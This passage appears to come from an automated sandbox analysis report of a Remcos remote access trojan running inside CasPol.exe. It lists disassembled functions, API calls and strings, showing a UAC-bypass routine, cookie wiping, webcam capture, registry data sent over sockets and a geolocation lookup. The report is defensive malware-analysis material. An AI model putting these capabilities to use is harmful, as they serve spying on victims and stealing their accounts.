                                                                                            • String ID:
                                                                                            • API String ID: 314583886-0
                                                                                            • Opcode ID: 15f6b1feb3d3775b51f59aeb9f2b7affb26a76ec7276939fd337acb65b8e2728
                                                                                            • Instruction ID: d74e55ca02e924b9256a88f94e7be2aa31ce1fd8fbfcff02d88bcfbefc6cbd9d
                                                                                            • Opcode Fuzzy Hash: 15f6b1feb3d3775b51f59aeb9f2b7affb26a76ec7276939fd337acb65b8e2728
                                                                                            • Instruction Fuzzy Hash: 32C12871904205ABFB24DF799C41AAE7BB8EF46314F2441AFE484A7351EB388E47C758
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: _free
                                                                                            • String ID:
                                                                                            • API String ID: 269201875-0
                                                                                            • Opcode ID: 154a0d9c569a12efbd1fb523a4d55ce0e4318de2d30962be95ff360cd9ef53d7
                                                                                            • Instruction ID: 5fecc71d39e6a90402c47f7728bb4f6831cdfeb90858b0dfc168023e2edb8b83
                                                                                            • Opcode Fuzzy Hash: 154a0d9c569a12efbd1fb523a4d55ce0e4318de2d30962be95ff360cd9ef53d7
                                                                                            • Instruction Fuzzy Hash: 2361BFB1900205AFEB20DF69C841BAABBF4EB45720F24417BE944FB392E7349D45CB59
                                                                                            APIs
                                                                                              • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
                                                                                            • _free.LIBCMT ref: 00444086
                                                                                            • _free.LIBCMT ref: 0044409D
                                                                                            • _free.LIBCMT ref: 004440BC
                                                                                            • _free.LIBCMT ref: 004440D7
                                                                                            • _free.LIBCMT ref: 004440EE
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: _free$AllocateHeap
                                                                                            • String ID: J7D
                                                                                            • API String ID: 3033488037-1677391033
                                                                                            • Opcode ID: 7bd75c35ecc30b271b00b77e92f4063212cf76abbfff81b413b55d476d69b5fb
                                                                                            • Instruction ID: b5a2c1f2d034459fb850ff781f480331835685433a1d37f27cfcf8091ebf3f31
                                                                                            • Opcode Fuzzy Hash: 7bd75c35ecc30b271b00b77e92f4063212cf76abbfff81b413b55d476d69b5fb
                                                                                            • Instruction Fuzzy Hash: 9251E371A00604AFEB20DF6AC841B6AB3F4EF95724F14416EE909D7251E739ED15CB88
                                                                                            APIs
                                                                                            • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,0044A838,?,00000000,00000000,00000000,00000000,0000000C), ref: 0044A105
                                                                                            • __fassign.LIBCMT ref: 0044A180
                                                                                            • __fassign.LIBCMT ref: 0044A19B
                                                                                            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 0044A1C1
                                                                                            • WriteFile.KERNEL32(?,00000000,00000000,0044A838,00000000,?,?,?,?,?,?,?,?,?,0044A838,?), ref: 0044A1E0
                                                                                            • WriteFile.KERNEL32(?,?,00000001,0044A838,00000000,?,?,?,?,?,?,?,?,?,0044A838,?), ref: 0044A219
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                            • String ID:
                                                                                            • API String ID: 1324828854-0
                                                                                            • Opcode ID: c2a57007ecaabeafdb2dea6b541a07f99f491d21749d301156e70ae2fc22959b
                                                                                            • Instruction ID: b40464c9ec282996611fef5cbd20273031f87559cdf671a411eba52403cbf28d
                                                                                            • Opcode Fuzzy Hash: c2a57007ecaabeafdb2dea6b541a07f99f491d21749d301156e70ae2fc22959b
                                                                                            • Instruction Fuzzy Hash: DB51E270E002099FEB10CFA8D881AEEBBF8FF09300F14416BE815E3391D6749951CB6A
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: _free
                                                                                            • String ID: HE$HE
                                                                                            • API String ID: 269201875-1978648262
                                                                                            • Opcode ID: fc29a47a32afb3350fc3e3c96543f328580f9b5143c0f3ce58bfce5294a38304
                                                                                            • Instruction ID: 4134de32792d44acead4bb36f8da9b5b282593f8ffe10db144b1eaf4d9577b64
                                                                                            • Opcode Fuzzy Hash: fc29a47a32afb3350fc3e3c96543f328580f9b5143c0f3ce58bfce5294a38304
                                                                                            • Instruction Fuzzy Hash: 90412A31A009106BEF24AABA8CD5A7F3B64DF45375F14031BFC1896293D67C8C4996AA
                                                                                            APIs
                                                                                            • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020019,?), ref: 00412CC1
                                                                                              • Part of subcall function 004129AA: RegQueryInfoKeyW.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00412A1D
                                                                                              • Part of subcall function 004129AA: RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?,?,00000000,?,?,?,?), ref: 00412A4C
                                                                                              • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                            • RegCloseKey.ADVAPI32(TUFTUF,00465554,00465554,00465900,00465900,00000071), ref: 00412E31
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CloseEnumInfoOpenQuerysend
                                                                                            • String ID: TUFTUF$>G$DG$DG
                                                                                            • API String ID: 3114080316-344394840
                                                                                            • Opcode ID: c7cce5a43e59f7109602142759317d9a4d8e8edd62c58d414e8fa74cc875f135
                                                                                            • Instruction ID: 92049c6ae7fba3f13a57cd60a3827c89810429dfa6cf24b756c0ab1f01d338b1
                                                                                            • Opcode Fuzzy Hash: c7cce5a43e59f7109602142759317d9a4d8e8edd62c58d414e8fa74cc875f135
                                                                                            • Instruction Fuzzy Hash: 0141A2316042009BC224F635D9A2AEF7394AFD0708F50843FF94A671E2EF7C5D4986AE
                                                                                            APIs
                                                                                            • _ValidateLocalCookies.LIBCMT ref: 00437AAB
                                                                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 00437AB3
                                                                                            • _ValidateLocalCookies.LIBCMT ref: 00437B41
                                                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 00437B6C
                                                                                            • _ValidateLocalCookies.LIBCMT ref: 00437BC1
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                            • String ID: csm
                                                                                            • API String ID: 1170836740-1018135373
                                                                                            • Opcode ID: a717e1e029c36c18052b78818950a58a3847fd0af0d72a643a188b4f53f37093
                                                                                            • Instruction ID: 9404c61c081bc4e6da2099be8a52027e1297fde76841380def533d3eaa533744
                                                                                            • Opcode Fuzzy Hash: a717e1e029c36c18052b78818950a58a3847fd0af0d72a643a188b4f53f37093
                                                                                            • Instruction Fuzzy Hash: CD410970A04209DBCF20EF19C844A9FBBB5AF0932CF14915BE8556B392D739EE05CB95
                                                                                            APIs
                                                                                              • Part of subcall function 00412513: RegOpenKeyExA.KERNELBASE(80000001,00000400,00000000,00020019,?), ref: 00412537
                                                                                              • Part of subcall function 00412513: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 00412554
                                                                                              • Part of subcall function 00412513: RegCloseKey.KERNELBASE(?), ref: 0041255F
                                                                                            • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040B76C
                                                                                            • PathFileExistsA.SHLWAPI(?), ref: 0040B779
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                                                                            • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                                                                            • API String ID: 1133728706-4073444585
                                                                                            • Opcode ID: 8901a8876a499c2edbdb9cb88194f9155861ea887fb9d44d6289f059aa3c6fcf
                                                                                            • Instruction ID: d844a8c095f6bc09782a4352348c5dfd082864f820bca84d12e352ec49be167e
                                                                                            • Opcode Fuzzy Hash: 8901a8876a499c2edbdb9cb88194f9155861ea887fb9d44d6289f059aa3c6fcf
                                                                                            • Instruction Fuzzy Hash: 5F216D71A00109A6CB04F7B2DCA69EE7764AE95318F40013FE902771D2EB7C9A49C6DE
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: ac8429af2de8aec4c7be5426e4bb47fdde12a831901fd5511e93482c0d59407e
                                                                                            • Instruction ID: 969edc756a0dffe936139f0dc9bce31aed38431af2e56c5058bd22e5c2f4fad6
                                                                                            • Opcode Fuzzy Hash: ac8429af2de8aec4c7be5426e4bb47fdde12a831901fd5511e93482c0d59407e
                                                                                            • Instruction Fuzzy Hash: 991124B1508654FBDB202F769C4493B3B6CEF82376B10016FFC15D7242DA7C8805C2AA
                                                                                            APIs
                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 0040FBFC
                                                                                            • int.LIBCPMT ref: 0040FC0F
                                                                                              • Part of subcall function 0040CEE0: std::_Lockit::_Lockit.LIBCPMT ref: 0040CEF1
                                                                                              • Part of subcall function 0040CEE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CF0B
                                                                                            • std::_Facet_Register.LIBCPMT ref: 0040FC4B
                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 0040FC71
                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 0040FC8D
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                                                            • String ID: P[G
                                                                                            • API String ID: 2536120697-571123470
                                                                                            • Opcode ID: 080c8d6f573d4b518caf4e655f0fcc3a1f7fca7e624085fd0a478c15266a48d0
                                                                                            • Instruction ID: a46b155a0a589d4ea75c4983af6a631921b9d9812a15003568faaf62f6f01cf1
                                                                                            • Opcode Fuzzy Hash: 080c8d6f573d4b518caf4e655f0fcc3a1f7fca7e624085fd0a478c15266a48d0
                                                                                            • Instruction Fuzzy Hash: 7611F331904518A7CB14FBA5D8469DEB7689E44358B20007BF905B72C1EB7CAE45C79D
                                                                                            APIs
                                                                                            • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041A53E
                                                                                            • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041A554
                                                                                            • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041A56D
                                                                                            • InternetCloseHandle.WININET(00000000), ref: 0041A5B3
                                                                                            • InternetCloseHandle.WININET(00000000), ref: 0041A5B6
                                                                                            Strings
                                                                                            • http://geoplugin.net/json.gp, xrefs: 0041A54E
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Internet$CloseHandleOpen$FileRead
                                                                                            • String ID: http://geoplugin.net/json.gp
                                                                                            • API String ID: 3121278467-91888290
                                                                                            • Opcode ID: a8345bfec3a0266268d270daa51b9d103f3819ad6082a53432280508f99075f6
                                                                                            • Instruction ID: 402fbdb1aff19a1981f8347c65821a4f206ec005c70a85ea4635686413b1fe25
                                                                                            • Opcode Fuzzy Hash: a8345bfec3a0266268d270daa51b9d103f3819ad6082a53432280508f99075f6
                                                                                            • Instruction Fuzzy Hash: 2711C87110A3126BD214AA169C45DBF7FDCEF46365F00053EF905D2191DB689C48C6B6
                                                                                            APIs
                                                                                              • Part of subcall function 0044FA22: _free.LIBCMT ref: 0044FA4B
                                                                                            • _free.LIBCMT ref: 0044FD29
                                                                                              • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A), ref: 00446ADB
                                                                                              • Part of subcall function 00446AC5: GetLastError.KERNEL32(0000000A,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A,0000000A), ref: 00446AED
                                                                                            • _free.LIBCMT ref: 0044FD34
                                                                                            • _free.LIBCMT ref: 0044FD3F
                                                                                            • _free.LIBCMT ref: 0044FD93
                                                                                            • _free.LIBCMT ref: 0044FD9E
                                                                                            • _free.LIBCMT ref: 0044FDA9
                                                                                            • _free.LIBCMT ref: 0044FDB4
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                            • String ID:
                                                                                            • API String ID: 776569668-0
                                                                                            • Opcode ID: 7c29d87e7d6a666a6374703866dd42c53a280d6db8acc668fe4e1522d65ba280
                                                                                            • Instruction ID: b6f47af98b99390d2ca34363280ce03bc5e4d1be0f6c4f29549f69d6ae0d3a9a
                                                                                            • Opcode Fuzzy Hash: 7c29d87e7d6a666a6374703866dd42c53a280d6db8acc668fe4e1522d65ba280
                                                                                            • Instruction Fuzzy Hash: 5F119031711B04B6F520FBB2CC07FCBB7DC9F42308F814C2EB29E76152E628A9184645
                                                                                            APIs
                                                                                            • CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe), ref: 00406835
                                                                                              • Part of subcall function 00406764: _wcslen.LIBCMT ref: 00406788
                                                                                              • Part of subcall function 00406764: CoGetObject.OLE32(?,00000024,004659B0,00000000), ref: 004067E9
                                                                                            • CoUninitialize.OLE32 ref: 0040688E
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: InitializeObjectUninitialize_wcslen
                                                                                            • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                                                                                            • API String ID: 3851391207-2637227304
                                                                                            • Opcode ID: cc256bbe825efe690782e207798e63cf697be23d062579cdcaa40baaa38e88a5
                                                                                            • Instruction ID: 622c6236034ee416db36617ed9a374104512909f75adacabffe0517dc70a223e
                                                                                            • Opcode Fuzzy Hash: cc256bbe825efe690782e207798e63cf697be23d062579cdcaa40baaa38e88a5
                                                                                            • Instruction Fuzzy Hash: A501C0722013106FE2287B11DC0EF3B2658DB4176AF22413FF946A71C1EAA9AC104669
                                                                                            APIs
                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 0040FEDF
                                                                                            • int.LIBCPMT ref: 0040FEF2
                                                                                              • Part of subcall function 0040CEE0: std::_Lockit::_Lockit.LIBCPMT ref: 0040CEF1
                                                                                              • Part of subcall function 0040CEE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CF0B
                                                                                            • std::_Facet_Register.LIBCPMT ref: 0040FF2E
                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 0040FF54
                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 0040FF70
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                                                            • String ID: H]G
                                                                                            • API String ID: 2536120697-1717957184
                                                                                            • Opcode ID: 4f42b0104d3fab8d9c54d588918312ac25f5cdf33bdc383dd9a32706d08bdfcf
                                                                                            • Instruction ID: c39742161ac3258eace465d30f2780732a1ff9819e97f4bd037edafe9ec39b9f
                                                                                            • Opcode Fuzzy Hash: 4f42b0104d3fab8d9c54d588918312ac25f5cdf33bdc383dd9a32706d08bdfcf
                                                                                            • Instruction Fuzzy Hash: 9011BF31900419ABCB24FBA5C8468DDB7799F95318B20007FF505B72C1EB78AF09C799
                                                                                            APIs
                                                                                            • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040B2E4
                                                                                            • GetLastError.KERNEL32 ref: 0040B2EE
                                                                                            Strings
                                                                                            • [Chrome Cookies not found], xrefs: 0040B308
                                                                                            • UserProfile, xrefs: 0040B2B4
                                                                                            • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040B2AF
                                                                                            • [Chrome Cookies found, cleared!], xrefs: 0040B314
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: DeleteErrorFileLast
                                                                                            • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                                                                            • API String ID: 2018770650-304995407
                                                                                            • Opcode ID: ec592ed9ccf4b9a5ae27431b7db5c03baafcaff9f2a5fd094053063a907b4898
                                                                                            • Instruction ID: 647c9f6895dd19beb09db90be4e639f81332b1b521455d1adc7a9c6a9ee315b4
                                                                                            • Opcode Fuzzy Hash: ec592ed9ccf4b9a5ae27431b7db5c03baafcaff9f2a5fd094053063a907b4898
                                                                                            • Instruction Fuzzy Hash: 3301A23164410557CB047BB5DD6B8AF3624ED50708F60013FF802B32E2FE3A9A0586CE
                                                                                            APIs
                                                                                            • AllocConsole.KERNEL32(00474358), ref: 0041BEB9
                                                                                            • ShowWindow.USER32(00000000,00000000), ref: 0041BED2
                                                                                            • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041BEF7
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Console$AllocOutputShowWindow
                                                                                            • String ID: Remcos v$5.3.0 Pro$CONOUT$
                                                                                            • API String ID: 2425139147-2527699604
                                                                                            • Opcode ID: 665a097808b038229c9a37eafed355beb7ea993dcaa7ec452e19bba1328996a1
                                                                                            • Instruction ID: 482f1cdaf256b8236abc94a0b12de3dc55517b66349f776fa4240982defd8f75
                                                                                            • Opcode Fuzzy Hash: 665a097808b038229c9a37eafed355beb7ea993dcaa7ec452e19bba1328996a1
                                                                                            • Instruction Fuzzy Hash: 180171B19803047BD600FBF29D4BFDD37AC9B14705F5004277644E7093EABCA554866D
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: (CG$C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$BG
                                                                                            • API String ID: 0-3292752334
                                                                                            • Opcode ID: b7a2e59ac2a9b4cfd69ae58ffa53ef09c4b6135ca76893af750d01e39a00b3fe
                                                                                            • Instruction ID: a0817f974ad937f6cb5b9dd001e5131ae01746641b95ac10126ddf8aadfa6e31
                                                                                            • Opcode Fuzzy Hash: b7a2e59ac2a9b4cfd69ae58ffa53ef09c4b6135ca76893af750d01e39a00b3fe
                                                                                            • Instruction Fuzzy Hash: 05F096B17022109BDB103774BC1967A3645A780356F01847BF94BFA6E5DB3C8851869C
                                                                                            APIs
                                                                                              • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                            • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 00419F64
                                                                                            • PlaySoundW.WINMM(00000000,00000000), ref: 00419F72
                                                                                            • Sleep.KERNEL32(00002710), ref: 00419F79
                                                                                            • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 00419F82
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: PlaySound$HandleLocalModuleSleepTime
                                                                                            • String ID: Alarm triggered$`Wu
                                                                                            • API String ID: 614609389-1738255680
                                                                                            • Opcode ID: ca31e2b0ec9ffc7d76ba02616ca36f971eae7819ef66c75d3d88d4c06d2fc62c
                                                                                            • Instruction ID: 0fe531f7edf44dbbc4d7c544cb5d4c76277d8d7fe89cd9bd4aa838a143c441bc
                                                                                            • Opcode Fuzzy Hash: ca31e2b0ec9ffc7d76ba02616ca36f971eae7819ef66c75d3d88d4c06d2fc62c
                                                                                            • Instruction Fuzzy Hash: 50E09A22A0422033862033BA7C0FC6F3E28DAC6B75B4100BFF905A21A2AE54081086FB
                                                                                            APIs
                                                                                            • __allrem.LIBCMT ref: 00439789
                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004397A5
                                                                                            • __allrem.LIBCMT ref: 004397BC
                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004397DA
                                                                                            • __allrem.LIBCMT ref: 004397F1
                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043980F
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                            • String ID:
                                                                                            • API String ID: 1992179935-0
                                                                                            • Opcode ID: 088a2e1066119da7e611ebb0c50ba568729b81e5e50e163a33f94ab824c18df8
                                                                                            • Instruction ID: 29148231e9435c1f59b8c02308e8e4f0c882d016d38a0f6ab7871d26eba04b65
                                                                                            • Opcode Fuzzy Hash: 088a2e1066119da7e611ebb0c50ba568729b81e5e50e163a33f94ab824c18df8
                                                                                            • Instruction Fuzzy Hash: 7A811B726017069BE724AE79CC82B6F73A8AF49328F24512FF511D66C1E7B8DD018B58
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: __cftoe
                                                                                            • String ID:
                                                                                            • API String ID: 4189289331-0
                                                                                            • Opcode ID: 69df1f9648de409375186bf4c737c9597d71512c260aa95240f454dab3e526b7
                                                                                            • Instruction ID: 646e0444ce84107b4b6d0ff1d92098e8eb0dfa86acef9ec08128487301265115
                                                                                            • Opcode Fuzzy Hash: 69df1f9648de409375186bf4c737c9597d71512c260aa95240f454dab3e526b7
                                                                                            • Instruction Fuzzy Hash: A851FC72900105ABFB249F598C81F6F77A9EFC9324F15421FF815A6281DB3DDD01866D
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: __freea$__alloca_probe_16
                                                                                            • String ID: a/p$am/pm
                                                                                            • API String ID: 3509577899-3206640213
                                                                                            • Opcode ID: d47145a3bc1b7d9653af932916ed6ede224238620767b4a39004040ccf91a16a
                                                                                            • Instruction ID: cf09b504ad0dd49156c227457699755419044adef71e8be36bbdd309731302d4
                                                                                            • Opcode Fuzzy Hash: d47145a3bc1b7d9653af932916ed6ede224238620767b4a39004040ccf91a16a
                                                                                            • Instruction Fuzzy Hash: 5FD1F271A00206EAFB249F68D945ABBB7B0FF06300F26415BE905AB749D37D8D41CB5B
                                                                                            APIs
                                                                                            • Sleep.KERNEL32(00000000), ref: 00403E8A
                                                                                              • Part of subcall function 00403FCD: __EH_prolog.LIBCMT ref: 00403FD2
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: H_prologSleep
                                                                                            • String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera$P>G
                                                                                            • API String ID: 3469354165-462540288
                                                                                            • Opcode ID: 0a3e354f07312ea273d2a23190d87bdb422154498fe74ef431d752b6c3118e3f
                                                                                            • Instruction ID: 0dce3c58988623f436d5c5d916b021fc345e3c2d86dff9f08dc17926b78fee06
                                                                                            • Opcode Fuzzy Hash: 0a3e354f07312ea273d2a23190d87bdb422154498fe74ef431d752b6c3118e3f
                                                                                            • Instruction Fuzzy Hash: A441A330A0420197CA14FB79C816AAD3A655B45704F00453FF809A73E2EF7C9A45C7CF
                                                                                            APIs
                                                                                            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419DFC
                                                                                            • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E10
                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E1D
                                                                                            • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,00419507), ref: 00419E52
